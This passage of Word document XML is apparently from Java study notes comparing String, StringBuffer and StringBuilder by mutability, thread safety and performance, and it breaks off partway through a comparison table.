          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of string operations is a concern (since StringBuilder is faster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F334677" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You're working in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D22EF97" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid StringBuilder in multi-threaded contexts where multiple threads may need to access the same object, as it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E3BB7" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D536E7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="20638E5F">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54559660" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Performance Comparison: String, StringBuffer, and StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276B1DF" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Immutable, creates a new object on every change — good for constant data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92ADCC" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Thread-safe but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2259A0" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StringBuilder</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Faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than StringBuffer but not thread-safe — ideal for single-threaded use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD54C40" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D536E7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="265997E6">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB40A4" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BA41F" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuilder = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable + thread-unsafe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> string manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E44395" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best choice for performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37016A98" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose StringBuilder when you need to frequently </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify strings</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and do not need thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC0BF7" w14:textId="23431C19" w:rsidR="00B7737D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B7737D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="050B72E3">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31981218" w14:textId="15664CA6" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc196307501"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between String, StringBuffer and StringBuilder?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="31FAFF8E" w14:textId="7A8E7412" w:rsidR="00DB1645" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB1645">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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7"/>
        <w:gridCol w:w="1364"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1704"/>
      </w:tblGrid>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="326CB527" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="563ECAA5" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F1121B" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58505A71" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>StringBuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAA8994" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>StringBuilder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="59A966C9" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F6E7076" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1ADD29CC" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3199432A" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB263BE" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="2CBA847D" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52D90309" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A565E30" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E684330" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50E6438E" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D5751" w:rsidRPr="00CE4B95" w14:paraId="45D671B9" w14:textId="77777777" w:rsidTr="008D5751">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A798A74" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="00B234DE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C12BDA" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Slow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54BC2E60" w14:textId="77777777" w:rsidR="008D5751" w:rsidRPr="00CE4B95" w:rsidRDefault="008D5751" w:rsidP="008D5751">
            <w:pPr>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Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
